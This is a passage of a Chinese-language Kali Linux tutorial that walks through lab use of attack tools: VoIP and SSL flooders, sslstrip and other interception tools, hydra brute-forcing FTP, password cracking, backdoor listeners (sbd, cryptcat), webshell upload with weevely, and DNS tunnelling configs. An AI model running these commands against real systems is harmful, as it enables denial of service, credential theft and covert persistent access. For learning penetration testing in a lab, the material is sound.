要打开 Inviteflood,首先打开终端并输入“inviteflood –parameters”

要获得帮助,您可以使用“inviteflood –h”

Invite Flood

接下来,您可以使用以下命令:

inviteflood eth0 target_extension  target_domain target_ip number_of_packets

其中:

  • target_extension 为 2000

  • target_domain 为 192.168.x.x

  • target_ip 为 192.168.x.x

  • number_of_packets 为 1

  • -a 是 SIP 帐户的别名

Target Execution

Iaxflood

Iaxflood 是一款 VoIP DoS 工具。要打开它,请在终端中输入“iaxflood sourcename destinationname numpackets”

要了解如何使用,请键入“iaxflood –h”

Iaxflood

thc-ssl-dos

THC-SSL-DOS 是一款用于验证 SSL 性能的工具。建立安全的 SSL 连接需要服务器上的处理能力是客户端的 15 倍。THCSSL-DOS 利用这种非对称特性来使服务器过载并将其从互联网上敲除。

以下是命令:

thc-ssl-dos victimIP httpsport –accept 

在这个例子中,它将是:

thc-ssl-dos 192.168.1.1 443 –accept 

其输出如下:

SSL Performance

SSL Error

Kali Linux - 嗅探与欺骗

嗅探工具的基本概念很简单,就像窃听一样,Kali Linux 有一些流行的工具可以实现此目的。在本章中,我们将学习 Kali 中可用的嗅探和欺骗工具。

Burpsuite

Burpsuite 可用作浏览器和 Web 服务器之间的嗅探工具,以查找 Web 应用程序使用的参数。

要打开 Burpsuite,请转到应用程序 → Web 应用程序分析 → burpsuite。

Web Analysis

要进行嗅探设置,我们将 Burpsuite 配置为充当代理。为此,请转到选项,如下图所示。选中所示的复选框。

在这种情况下,代理 IP 将为 127.0.0.1,端口为 8080。

Proxy IP

然后配置浏览器代理,即 Burpsuite 机器和端口的 IP。

Configure Browser

要启动拦截,请转到代理 → 拦截 → 单击“拦截已开启”。

继续导航到您要查找参数以测试漏洞的网页。

Intercept

在这种情况下,它是 IP 为 192.168.1.102 的 metasploitable 机器。

Machine IP

转到“HTTP 历史记录”。在下图中,红色箭头标记的行显示了最后一个请求。在 Raw 中,隐藏的参数(例如会话 ID)和其他参数(例如用户名和密码)已用红色下划线标出。

Request Parameter

mitmproxy

mitmproxy 是一个支持 SSL 的中间人 HTTP 代理。它提供一个控制台界面,允许实时检查和编辑流量流。

要打开它,请转到终端并输入“mitmproxy -parameter”,要获取有关命令的帮助,请键入“mitmproxy –h”

Mitmproxy

要启动 mitmproxy,请键入“mitmproxy –p portnumber”。在这种情况下,它是“mitmproxy –p 80”。

Port Number

Wireshark

Wireshark 是最好的数据包分析器之一。它深入分析帧级别的分组。您可以从其官方网页https://www.wireshark.org/获取有关 Wireshark 的更多信息。在 Kali 中,可以使用以下路径找到它 - 应用程序 → 嗅探和欺骗 → wireshark。

Wireshark

单击 wireshark 后,将打开以下 GUI。

Wireshark GUI

单击“开始”,数据包捕获将开始,如下图所示。

Packet Capturing

sslstrip

sslstrip 是一种中间人攻击,它强制受害者的浏览器通过 HTTP 以纯文本方式进行通信,并且代理修改了来自 HTTPS 服务器的内容。为此,sslstrip 正在“剥离”https:// URL 并将其转换为 http:// URL。

要打开它,请转到应用程序 → 09-嗅探和欺骗 → 欺骗和中间人攻击 → sslstrip。

Spoofing

Application MITM

要设置它,请写入将所有 80 端口通信转发到 8080。

Port Comminucation

然后,启动所需端口的sslstrip命令。

SSLtrip Command

Kali Linux - 密码破解工具

在本章中,我们将学习 Kali Linux 中使用的重要的密码破解工具。

Hydra

Hydra 是一款登录破解工具,支持许多要攻击的协议(Cisco AAA、Cisco auth、Cisco enable、CVS、FTP、HTTP(S)-FORM-GET、HTTP(S)-FORM-POST、HTTP(S)-GET、HTTP(S)-HEAD、HTTP-Proxy、ICQ、IMAP、IRC、LDAP、MS-SQL、MySQL、NNTP、Oracle Listener、Oracle SID、PC-Anywhere、PC-NFS、POP3、PostgreSQL、RDP、Rexec、Rlogin、Rsh、SIP、SMB(NT)、SMTP、SMTP Enum、SNMP v1+v2+v3、SOCKS5、SSH (v1 和 v2)、SSHKEY、Subversion、Teamspeak (TS2)、Telnet、VMware-Auth、VNC 和 XMPP)。

要打开它,请转到应用程序 → 密码攻击 → 在线攻击 → hydra。

Hydra

它将打开终端控制台,如下图所示。

Open Terminal

在这种情况下,我们将对 metasploitable 机器(IP 为 192.168.1.101)的 FTP 服务进行暴力破解。

Brute Force

我们在 Kali 中创建了一个扩展名为“lst”的词表,路径为usr\share\wordlist\metasploit

Share Wordlist

命令如下:

hydra -l /usr/share/wordlists/metasploit/user -P 
/usr/share/wordlists/metasploit/ passwords ftp://192.168.1.101 –V 

其中–V是在尝试时使用的用户名和密码

Hydra Command

如下图所示,找到了用户名和密码,即 msfadmin:msfadmin

Admin Password

Johnny

Johnny 是 John the Ripper 密码破解工具的 GUI。通常,它用于弱密码。

要打开它,请转到应用程序 → 密码攻击 → johnny。

Johnny

在这种情况下,我们将使用以下命令获取 Kali 机器的密码,并在桌面上创建一个文件。

Desktop

单击“打开密码文件”→“确定”,所有文件将如下图所示。

Open File

单击“开始攻击”。

Start Attack

攻击完成后,点击左侧面板中的“密码”,密码将显示出来。

Unshaded

John

john 是 Johnny GUI 的命令行版本。要启动它,请打开终端并输入 “john”

Unshadowing

如果需要显示密码,我们需要输入以下命令:

root@kali:~# unshadow passwd shadow > unshadowed.txt 

Rainbowcrack

RainbowCrack 软件通过彩虹表查找来破解哈希。彩虹表是存储在硬盘上的普通文件。通常,彩虹表是从网上购买的,或者可以使用不同的工具编译。

要打开它,请转到应用程序 → 密码攻击 → 点击“rainbowcrack”。

RainbowCrack

破解哈希密码的命令是:

rcrack path_to_rainbow_tables -f path_to_password_hash 

SQLdict

这是一个针对 SQL 服务器的字典攻击工具,使用非常简单易懂。要打开它,请打开终端并输入 “sqldict”。它将打开以下界面。

Sql Dict

在“目标 IP 服务器”下,输入保存 SQL 的服务器的 IP 地址。在“目标帐户”下,输入用户名。然后加载包含密码的文件,并点击“开始”,直到完成。

hash-identifier

这是一个用于识别哈希类型的工具,也就是它们被用于什么。例如,如果我有一个 HASH,它可以告诉我它是一个 Linux 哈希还是 Windows 哈希。

Hash Identifier

上面的屏幕显示它可能是一个 MD5 哈希,并且似乎是域缓存凭据。

Kali Linux - 维持访问权限

本章我们将介绍 Kali 使用的工具,这些工具用于维护连接,即使在连接和断开连接后也能访问被入侵的机器。

Powersploit

这是一个针对 Windows 机器 的工具。它在受害者的机器上安装了 PowerShell。这个工具帮助黑客通过 PowerShell 连接到受害者的机器。

要打开它,请打开左侧的终端并输入以下命令进入 powersploit 文件夹:

cd /usr/share/powersploit/ 

如果你输入 “ls”,它将列出所有可以在获得访问权限后下载并安装到受害者机器上的 powersploit 工具。大多数工具的名字都根据其功能进行了自我解释。

Powersploit

在受害者的机器上下载此工具的一种简单方法是创建一个 Web 服务器,powersploit 工具允许使用以下命令轻松创建:

python -m SimpleHTTPServer 

Download Tool

之后,如果你输入:http://<Kali 机器 IP 地址>:8000/,结果如下。

Directory Listimg

Sbd

sbd 是一个类似于 Netcat 的工具。它是可移植的,可以在 Linux 和 Microsoft 机器上使用。sbd 功能包括 AES-CBC-128 + HMAC-SHA1 加密。基本上,它有助于随时连接到受害者的机器上的特定端口并远程发送命令。

要打开它,请转到终端并输入 “sbd -l -p port” 以使服务器接受连接。

Connection Accept

在本例中,我们使用端口 44 作服务器监听端口。

Case Port

在受害者端,输入 “sbd IPofserver port”。将建立一个连接,我们可以通过它发送远程命令。

在本例中,它是“localhost”,因为我们在同一台机器上进行了测试。

Ipofserver

最后,在服务器上,您将看到已建立连接,如下面的屏幕截图所示。

Server Connection

Webshell

Webshell 可用于维护访问权限或入侵网站。但大多数 Webshell 会被杀毒软件检测到。C99 php shell 在杀毒软件中非常有名。任何常见的杀毒软件都会很容易地将其检测为恶意软件。

通常,它们的主要功能是通过 Web 界面发送系统命令。

要打开它,在终端中输入 “cd /usr/share/webshells/”

Webshell

正如你所看到的,它们根据编程语言被分成不同的类别:asp、aspx、cfm、jsp、perl、php。

如果你进入 PHP 文件夹,你可以看到所有用于 php 网页的 webshell。

Folder

例如,要将 shell 上传到 Web 服务器,请上传 “simple-backdoor.php”,打开网页和 Web shell 的 URL。

最后,输入 cmd 命令。你将看到所有信息,如下面的屏幕截图所示。

Write Command

Weevely

Weevely 是一个 PHP webshell,它模拟 telnet 样的连接。这是一个用于 Web 应用程序后期利用的工具,可以用作隐蔽的后门或 Web shell 来管理合法的 Web 帐户,甚至是免费托管的帐户。

要打开它,请转到终端并输入“weevely”,你将看到其使用方法。

Weevely

要生成 shell,请输入 “weevely generate password pathoffile”。如下面的屏幕截图所示,它是在“桌面”文件夹中生成的,该文件需要上传到 Web 服务器以获得访问权限。

Generate Shell

上传 Web shell 后(如下面的屏幕截图所示),我们可以使用命令 “weevely URL password” 通过 cmd 连接到服务器,你将看到会话已启动。

Uploading File

http-tunnel

http-tunnel 创建一个通过 HTTP 请求进行隧道传输的双向虚拟数据流。如果需要,请求可以通过 HTTP 代理发送。这对于位于限制性防火墙后面的用户非常有用。如果允许通过 HTTP 代理访问 WWW,则可以使用 http-tunnel 和 telnet 或 PPP 连接到防火墙外部的计算机。

首先,我们应该使用以下命令创建一个隧道服务器:

httptunnel_server –h 

然后,在客户端输入 “httptunnel_client –h”,两者都将开始接受连接。

dns2tcp

这又是一个隧道工具,它有助于通过 DNS 流量(即 UDP 53 端口)传递 TCP 流量。

要启动它,请输入 “dns2tcpd”。打开脚本后将解释其使用方法。

DNSTcp

在服务器端,输入此命令配置文件。

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

在客户端,输入此命令。

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076 

使用此命令启动隧道。

cryptcat

它类似于 Netcat 的另一个工具,允许以加密方式与受害者的机器建立 TCP 和 UDP 连接。

要启动一个服务器来监听连接,请输入以下命令:

cryptcat –l –p port –n 

cryptcat

其中:

  • -l 表示监听连接

  • -p 表示端口号参数

  • -n 表示不进行名称解析

在客户端,连接命令是 “cryptcat IPofServer PortofServer”

Port of Server

Kali Linux - 逆向工程

本章我们将学习 Kali Linux 的逆向工程工具。

OllyDbg

OllyDbg 是一个用于 Microsoft Windows 应用程序的 32 位汇编级分析调试器。它强调二进制代码分析,在源代码不可用的情况下特别有用。通常,它用于破解商业软件。

要打开它,请转到应用程序 → 逆向工程 → ollydbg

OllyDbg

要加载 EXE 文件,请转到黄色显示的“打开文件夹”,在上面的屏幕截图中用红色方框标出。

加载后,您将看到以下视图,您可以在其中更改二进制文件。

Binaries

dex2jar

这是一个应用程序,它有助于将 APK 文件(Android)转换为 JAR 文件,以便查看源代码。要使用它,请打开终端并输入 ”d2j-dex2jar –d /file location”

在本例中,该文件是桌面上名为 “classes.dex” 的文件。

Classes

以下行显示已创建 JAR 文件。

Jar File

Created File

jd-gui

JD-GUI 是一个独立的图形实用程序,它显示 “.class” 文件的 Java 源代码。您可以浏览重建的源代码。在本例中,我们可以重建从 dex2jar 工具中提取的文件。

要启动它,请打开终端并输入 “jd-gui”,然后将打开以下视图。

要导入文件,请点击左上角的打开文件夹 Open Folder 图标,然后导入文件。

Jd Gui

apktool

Apktool 是反向整个 Android 应用程序的最佳工具之一。它可以将资源解码为几乎原始的形式,并在进行修改后重建它们。

要打开它,请转到终端并输入 “apktool”

要反编译 apk 文件,请输入“apktool d apk 文件”

Apktool

反编译将开始,如下面的屏幕截图所示。

Decompilation

Kali Linux - 报告工具

本章我们将学习 Kali Linux 中的一些报告工具。

Dradis

在我们执行的所有工作中,重要的是要共享所产生的结果,跟踪我们的工作等等。为此,Kali 有一个名为 dradis 的报告工具,它是一个 Web 服务。

步骤 1 - 要启动 Dradis,请输入 “service dradis start”

Dradis

步骤 2 - 要打开它,请转到应用程序 → 报告工具 → dradis。

Reporting

Web URL 将打开。局域网中的任何人都可以在以下 URL 中打开它:https://Kali 机器 IP 地址:3004

使用第一次使用的用户名和密码登录。

LAN Open

步骤 3 - 登录后,您可以导入来自 NMAP、NESSUS、NEXPOSE 的文件。为此,请转到“从文件导入”→ 点击“新的导入程序(具有实时反馈)”。

Import Real Time

步骤 4 - 选择要上传的文件类型。在本例中,它是“Nessus 扫描”→ 点击“浏览”。

Upload Manager

如果您现在转到主页,在左侧面板上,您将看到导入的扫描位于包含其主机和端口详细信息的文件夹中。

Port Details

Metagoofil

Metagoofil 在 Google 中进行搜索以识别并将文档下载到本地磁盘,然后提取元数据。它提取属于特定公司、个人、对象等的公共文档的元数据。

要打开它,请转到:“usr/share/metagoofil/”

Metagoofil

要开始搜索,请输入以下命令:

python metagoofil.py 

您可以使用以下参数与该命令一起使用:

  • –d(域名)

  • –t(要下载的文件类型,dox、pdf 等)

  • –l(限制结果 10、100)

  • –n(限制要下载的文件数量)

  • –o(保存文件的路径)

  • –f(输出文件)

以下示例仅显示隐藏的域名。

Hidden Domain Name
广告
© . All rights reserved.